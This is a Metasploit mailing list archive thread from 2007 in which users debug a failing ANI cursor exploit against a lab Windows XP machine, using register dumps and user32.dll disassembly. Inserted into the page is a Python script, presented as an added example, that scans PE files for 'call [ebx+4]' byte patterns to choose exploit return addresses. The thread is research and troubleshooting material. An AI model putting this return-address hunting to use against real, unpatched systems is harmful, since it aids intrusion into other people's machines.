Metasploit mailing list archives
Metasploit vs ANI
From: thomas.werth at vahle.de (Thomas Werth)
Date: Wed, 04 Apr 2007 09:35:10 +0200
In process memory, 0x769FC81A is a MOV ECX,DWORD PTR SS:[EBP-1D8]. user32.dll has no address of 0x769fc81a; it starts with 0x77 ...

The machine is semi-patched (even less than more; how should I test on this machine when it is being patched?).

How can I use msfpescan to find an ebx+4 in user32.dll?
./msfpescan -j ebx+4 /path/to/user32.dll raises (no surprise) a syntax error; ./msfpescan -j ebx /path/to/user32.dll just lists ebx calls.

mmiller at hick.org wrote:
> Yeah, your machine has an older version of user32.dll. With that said, if you're using the Automatic target, it should also try to trigger the vulnerability using a complete overwrite of the return address with 0x769fc81a. What do you get when you disassemble this address? If it's something other than a call [ebx+4], then that will explain why it's failing to hit in both cases. Is the machine you're testing against using the latest patches (aside from the latest ANI patch)?
>
> On Wed, Apr 04, 2007 at 08:59:46AM +0200, Thomas Werth wrote:
> > user32.dll is version 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158). The instructions in user32.dll around 0x77d525ba look like this:
> >
> >     77D525B3 mov ebx, [esi+0DCh]
> >     77D525B9 test ebx, ebx
> >     77D525BB mov [ebp+arg_0], eax
> >
> > It seems like this user32.dll doesn't match what the Metasploit opcode DB prints out.
> >
> > mmiller at hick.org wrote:
> > > What version of user32.dll do you have? What is the instruction at 77d525ba? The partial overwrite is succeeding, but it appears you have something other than a call [ebx+4] at this location.
> > >
> > > On Wed, Apr 04, 2007 at 08:26:44AM +0200, Thomas Werth wrote:
> > > > OK, here are the details: msf 3 with the latest updates, running on a BT2 HD install, using the win/shell/bind_tcp payload. Test: VMware Windows XP SP2 German, no ANI patch installed, running as admin, using OllyDbg on IE. WinXP connects to the given msf random URI as soon as msf signals ready. OllyDbg catches on error:
> > > >
> > > >     EAX ED40601B
> > > >     ECX 7C92056D ntdll.7C92056D
> > > >     EDX 00000000
> > > >     EBX 0012DF80
> > > >     ESP 0012DECC
> > > >     EBP FED47515
> > > >     ESI 0012DEFC ASCII "anih$"
> > > >     EDI 0012DECC
> > > >     EIP 77D525BA USER32.77D525BA
> > > >     C 0  ES 0023 32bit 0(FFFFFFFF)
> > > >     P 1  CS 001B 32bit 0(FFFFFFFF)
> > > >     A 0  SS 0023 32bit 0(FFFFFFFF)
> > > >     Z 1  DS 0023 32bit 0(FFFFFFFF)
> > > >     S 0  FS 003B 32bit 7FFDF000(FFF)
> > > >     T 0  GS 0000 NULL
> > > >     D 0
> > > >     O 0  LastErr ERROR_INVALID_PARAMETER (00000057)
> > > >     EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)
> > > >     ST0 empty -??? FFFF 0084837B 6B84837B
> > > >     ST1 empty -??? FFFF 00000000 6B000000
> > > >     ST2 empty -??? FFFF 00000084 0083007B
> > > >     ST3 empty -??? FFFF 00000084 0083007B
> > > >     ST4 empty -??? FFFF 6B84837B 6B84837B
> > > >     ST5 empty -??? FFFF 00000084 0083007B
> > > >     ST6 empty 1.0000000000000000000
> > > >     ST7 empty 1.0000000000000000000
> > > >                    3 2 1 0      E S P U O Z D I
> > > >     FST 4000  Cond 1 0 0 0  Err 0 0 0 0 0 0 0 0  (EQ)
> > > >     FCW 027F  Prec NEAR,53  Mask    1 1 1 1 1 1
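The question above (how to locate a `call [ebx+4]` in a specific user32.dll build) can be answered without the opcode database by scanning the DLL on disk. The following Python script is an added example, not code from the thread or from Metasploit: it parses the PE section table so that file offsets map back to virtual addresses, then reports every address whose bytes decode to `call dword ptr [ebx+4]` (FF 53 04) or `jmp dword ptr [ebx+4]` (FF 63 04). The sample image it builds is constructed for the demonstration and is not user32.dll; its image base 0x77D10000 and its `.text` layout are assumptions.

```python
import struct

# Fixed x86 encodings of the two "jump equivalents" through [ebx+4]:
#   FF /2 with ModRM 0x53 (mod=01 reg=010 rm=011, disp8) = call dword ptr [ebx+4]
#   FF /4 with ModRM 0x63 (mod=01 reg=100 rm=011, disp8) = jmp  dword ptr [ebx+4]
PATTERNS = {
    b"\xff\x53\x04": "call dword ptr [ebx+4]",
    b"\xff\x63\x04": "jmp dword ptr [ebx+4]",
}


def parse_sections(data):
    """Return (image_base, [(name, virtual_address, raw_offset, raw_size), ...])
    from a PE32 or PE32+ file image held in memory."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4
    nsections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == 0x10B:            # PE32: ImageBase is a DWORD at optional header +28
        image_base = struct.unpack_from("<I", data, opt + 28)[0]
    elif magic == 0x20B:          # PE32+: ImageBase is a QWORD at optional header +24
        image_base = struct.unpack_from("<Q", data, opt + 24)[0]
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    sections = []
    for i in range(nsections):
        hdr = opt + opt_size + 40 * i
        name = data[hdr:hdr + 8].rstrip(b"\0").decode("ascii", "replace")
        _vsize, vaddr, rsize, rptr = struct.unpack_from("<IIII", data, hdr + 8)
        sections.append((name, vaddr, rptr, rsize))
    return image_base, sections


def find_jump_equivalents(data, patterns=PATTERNS):
    """Scan every section's raw bytes for the patterns and return
    [(virtual_address, mnemonic, section_name), ...] sorted by address.
    Matches are byte-exact, so a hit may sit inside a longer instruction;
    that is fine for a return-address target, because execution resumes at
    the address we land on, not at the compiler's instruction boundary."""
    image_base, sections = parse_sections(data)
    hits = []
    for name, vaddr, rptr, rsize in sections:
        blob = data[rptr:rptr + rsize]
        for pat, mnemonic in patterns.items():
            pos = blob.find(pat)
            while pos >= 0:
                hits.append((image_base + vaddr + pos, mnemonic, name))
                pos = blob.find(pat, pos + 1)
    return sorted(hits)


def build_sample_pe(image_base=0x77D10000):
    """Constructed minimal PE32 with a single .text section containing one
    call [ebx+4] and one jmp [ebx+4]. Test input only, NOT user32.dll; the
    image base is an arbitrary assumption."""
    code = b"\x90" * 16 + b"\xff\x53\x04" + b"\x90" * 8 + b"\xff\x63\x04" + b"\xc3"
    code += b"\0" * (0x200 - len(code))
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)           # e_lfanew = 0x40
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x2102)
    opt = struct.pack("<HBBIIIIIII", 0x10B, 0, 0, len(code), 0, 0,
                      0x1000, 0x1000, 0x2000, image_base)
    opt += b"\0" * (224 - len(opt))
    sec = b".text\0\0\0" + struct.pack("<IIIIIIHHI", len(code), 0x1000,
                                        len(code), 0x200, 0, 0, 0, 0, 0x60000020)
    headers = dos + coff + opt + sec
    headers += b"\0" * (0x200 - len(headers))
    return headers + code


if __name__ == "__main__":
    import sys
    # Pass a real PE (e.g. a copy of the target's user32.dll) on the command
    # line, or run against the constructed sample image.
    image = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_pe()
    for addr, mnemonic, section in find_jump_equivalents(image):
        print("0x%08x  %-24s %s" % (addr, mnemonic, section))
```

Run it against the exact user32.dll from the target (version and language matter, as the thread shows) and check that the address you pick decodes to the expected instruction in the debugger before relying on it; an address that looks right in the opcode database for one build is, on another build, just whatever bytes happen to be there.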
Current thread:
- Metasploit vs ANI, (continued)
- Metasploit vs ANI Nicolas RUFF (Apr 02)
- Metasploit vs ANI mmiller at hick.org (Apr 02)
- Metasploit vs ANI H D Moore (Apr 02)
- Metasploit vs ANI Giorgio Casali (Apr 03)
- Metasploit vs ANI Thomas Werth (Apr 03)
- Metasploit vs ANI mmiller at hick.org (Apr 03)
- Metasploit vs ANI Thomas Werth (Apr 03)
- Metasploit vs ANI mmiller at hick.org (Apr 03)
- Metasploit vs ANI Thomas Werth (Apr 03)
- Metasploit vs ANI mmiller at hick.org (Apr 04)
- Metasploit vs ANI Thomas Werth (Apr 04)
- Metasploit vs ANI H D Moore (Apr 04)
- Metasploit vs ANI H D Moore (Apr 04)
- Metasploit vs ANI Fabrice MOURRON (Apr 04)
- Metasploit vs ANI security (Apr 05)
- Metasploit vs ANI Jerome Athias (Apr 05)
- Metasploit vs ANI security (Apr 05)
- Metasploit vs ANI Thomas Werth (Apr 11)
- Metasploit vs ANI Donnie Werner (Apr 05)
- Metasploit vs ANI Jerome Athias (Apr 04)
- Metasploit vs ANI Jerome Athias (Apr 04)